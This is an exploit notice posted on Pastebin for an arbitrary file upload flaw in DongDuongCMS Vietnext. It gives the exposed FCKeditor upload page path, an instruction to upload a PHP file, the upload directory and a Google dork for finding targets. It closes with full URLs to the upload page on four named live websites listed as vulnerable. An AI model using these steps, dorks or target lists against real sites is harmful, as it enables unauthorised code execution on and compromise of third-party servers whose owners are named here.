Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : DongDuongCMS Vietnext Unauthorized File Insertation Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/03/2019
- # Vendor Homepages : dongduongcorp.com ~ dongduongcms.com ~ vietnext.vn
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Design by Vietnext ® site:vn
- # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030021
- ####################################################################
- # Description about Software :
- ***************************
- DongDuongCMS Vietnext is a Vietnamese Web Hosting and Web Development Company.
- ####################################################################
- # Impact :
- **********
- DongDuongCMS Vietnext is prone to an arbitrary file upload vulnerability.
- An attacker may leverage this issue to upload arbitrary files to the affected computer; this can
- result in arbitrary code execution within the context of the vulnerable application.
- Weaknesses in this category are related to the management of permissions, privileges,
- and other security features that are used to perform access control.
- ####################################################################
- # Arbitrary File Upload / Unauthorized File Insertation Exploit :
- *****************************************************
- /jscripts/FCKeditor/editor/filemanager/upload/test.html
- Choose PHP and upload your file.
- # Directory File Path :
- *********************
- /vantindat/images/......
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] tudonghoa2hand.com/jscripts/FCKeditor/editor/filemanager/upload/test.html
- [+] anhthinh.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html
- [+] viettechnic.com.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html
- [+] vinhlinh.com.vn/jscripts/FCKeditor/editor/filemanager/upload/test.html
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement